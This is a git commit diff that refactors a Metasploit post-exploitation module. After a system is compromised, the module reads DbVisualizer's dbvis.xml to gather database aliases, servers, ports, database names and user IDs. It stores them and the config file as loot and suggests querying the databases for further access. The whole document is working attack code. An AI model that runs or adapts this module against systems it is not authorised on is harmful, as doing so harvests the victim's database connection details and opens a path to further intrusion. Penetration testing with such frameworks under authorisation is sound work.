Merge branch 'wchen-r7-pr3522'

philophobia78 · philophobia78 · commit e66cc003ae4f · 2014-07-15T09:18:40.000+02:00
Changes ok
diff --git a/modules/post/multi/gather/dbvis_enum.rb b/modules/post/multi/gather/dbvis_enum.rb
@@ -5,7 +5,6 @@
 
 require 'msf/core'
 require 'msf/core/auxiliary/report'
-require "resolv"
 
 class Metasploit3 < Msf::Post
 
@@ -15,22 +14,21 @@ class Metasploit3 < Msf::Post
 
   def initialize(info={})
     super( update_info( info,
-        'Name'          => 'Dbvis Connections settings',
+        'Name'          => 'Multi Gather Dbvis Connections Settings',
         'Description'   => %q{
           DbVisualizer stores the user database configuration in dbvis.xml.
-	  This module retrieves the connections settings from this file.
+          This module retrieves the connections settings from this file.
         },
         'License'       => MSF_LICENSE,
-        'Author'        => [ 'David Bloom <@philophobia78>' ],
+        'Author'        => [ 'David Bloom' ], # Twitter: @philophobia78
         'Platform'      => %w{ linux win },
         'SessionTypes'  => [ 'meterpreter', 'shell']
       ))
   end
 
   def run
-
     db_table = Rex::Ui::Text::Table.new(
-    'Header'    => "Dbvis available databases",
+    'Header'    => "Dbvis Databases",
     'Indent'    => 2,
     'Columns'   =>
     [
@@ -43,15 +41,14 @@ def run
       "Userid",
     ])
 
-
     dbs = []
 
     case session.platform
     when /linux/
       user = session.shell_command("whoami").chomp
       print_status("Current user is #{user}")
       if (user =~ /root/)
-	 user_base="/root/"
+        user_base = "/root/"
       else
          user_base="/home/#{user}/"
       end
@@ -65,77 +62,94 @@ def run
       dbvis_file = user_profile + "\\.dbvis\\config70\\dbvis.xml"
     end
 
+    unless file?(dbvis_file)
+      print_error("File not found: #{dbvis_file}")
+      return
+    end
+
     db = {}
     print_status("Reading: #{dbvis_file}")
-    dbfound=false
+    dbfound = false
+
+    raw_xml = ""
+    begin
+      raw_xml = read_file(dbvis_file)
+    rescue EOFError
+      # If there's nothing in the file, we hit EOFError
+      print_error("Nothing read from file: #{dbvis_file}, file may be empty")
+      return
+    end
+
     # read config file
-    read_file(dbvis_file).each_line do |line|
-	if (line =~ /<Database id=/)
-	   dbfound=true
-	else if (line =~ /<\/Database>/)
-	   dbfound=false
-	   if db[:Database].nil?
-	      db[:Database]="";
-	   end
-	   if db[:Namespace].nil?
-	      db[:Namespace]="";
-	   end
-       	   # save	
-           dbs << db if (db[:Alias] and db[:Type] and  db[:Server] and  db[:Port] )
-	   db = {}
-	 end
-	 if (dbfound=true)
-	   # get the alias
-	   if (line =~ /<Alias>([\S+\s+]+)<\/Alias>/i)
-	      db[:Alias] = $1
-	   end
-
-	   # get the type
-	   if (line =~ /<Type>([\S+\s+]+)<\/Type>/i)
-	      db[:Type] = $1
-	   end
-           # get the user
-	   if (line =~ /<Userid>([\S+\s+]+)<\/Userid>/i)
-	     db[:Userid] = $1
-	   end
-
-	   # get the server
-	   if (line =~ /<UrlVariable UrlVariableName="Server">([\S+\s+]+)<\/UrlVariable>/i)
-	      db[:Server] = $1
-	   end
-
-	   # get the port
-	   if (line =~ /<UrlVariable UrlVariableName="Port">([\S+]+)<\/UrlVariable>/i)
-	      db[:Port] = $1
-	   end
-
-	   # get the database
-	   if (line =~ /<UrlVariable UrlVariableName="Database">([\S+\s+]+)<\/UrlVariable>/i)
-	      db[:Database] = $1
-	   end
-
-           # get the Namespace
-	   if (line =~ /<UrlVariable UrlVariableName="Namespace">([\S+\s+]+)<\/UrlVariable>/i)
-	      db[:Namespace] = $1
-	   end
-	end
-     end
+    raw_xml.each_line do |line|
+      if line =~ /<Database id=/
+        dbfound = true
+      elsif line =~ /<\/Database>/
+        dbfound=false
+        if db[:Database].nil?
+          db[:Database] = "";
+        end
+        if db[:Namespace].nil?
+          db[:Namespace] = "";
+        end
+        # save
+        dbs << db if (db[:Alias] and db[:Type] and  db[:Server] and db[:Port] )
+        db = {}
+      end
+
+      if dbfound == true
+        # get the alias
+        if (line =~ /<Alias>([\S+\s+]+)<\/Alias>/i)
+          db[:Alias] = $1
+        end
+
+        # get the type
+        if (line =~ /<Type>([\S+\s+]+)<\/Type>/i)
+          db[:Type] = $1
+        end
+
+        # get the user
+        if (line =~ /<Userid>([\S+\s+]+)<\/Userid>/i)
+          db[:Userid] = $1
+        end
+
+        # get the server
+        if (line =~ /<UrlVariable UrlVariableName="Server">([\S+\s+]+)<\/UrlVariable>/i)
+          db[:Server] = $1
+        end
+
+        # get the port
+        if (line =~ /<UrlVariable UrlVariableName="Port">([\S+]+)<\/UrlVariable>/i)
+          db[:Port] = $1
+        end
+
+        # get the database
+        if (line =~ /<UrlVariable UrlVariableName="Database">([\S+\s+]+)<\/UrlVariable>/i)
+          db[:Database] = $1
+        end
+
+        # get the Namespace
+        if (line =~ /<UrlVariable UrlVariableName="Namespace">([\S+\s+]+)<\/UrlVariable>/i)
+          db[:Namespace] = $1
+        end
+      end
     end
 
     # print out
     dbs.each do |db|
-      if (!!(db[:Server]   =~ Resolv::IPv4::Regex))
-	 print_good("Reporting #{db[:Server]} ")
-	 report_host(:host =>  db[:Server]);
+      if ::Rex::Socket.is_ipv4?(db[:Server].to_s)
+        print_good("Reporting #{db[:Server]} ")
+        report_host(:host =>  db[:Server]);
       end
+
       db_table << [ db[:Alias] , db[:Type] , db[:Server], db[:Port], db[:Database], db[:Namespace], db[:Userid]]
     end
 
     if db_table.rows.empty?
       print_status("No database settings found")
     else
-      print_line("\n" + db_table.to_s)
-
+      print_line("\n")
+      print_line(db_table.to_s)
       print_good("Try to query listed databases with dbviscmd.sh (or .bat) -connection <alias> -sql <statements> and have fun !")
       print_good("")
       # store found databases
@@ -146,16 +160,11 @@ def run
         db_table.to_csv,
         "dbvis_databases.txt",
         "dbvis databases")
-
       print_good("Databases settings stored in: #{p.to_s}")
-
     end
+
     print_status("Downloading #{dbvis_file}")
     p = store_loot("dbvis.xml", "text/xml", session, read_file(dbvis_file), "#{dbvis_file}", "dbvis config")
     print_good "dbvis.xml saved to #{p.to_s}"
-    
-    rescue ::Exception => e
-        print_error("Couldn't read #{dbvis_file}: #{e.to_s}")
   end
-
 end
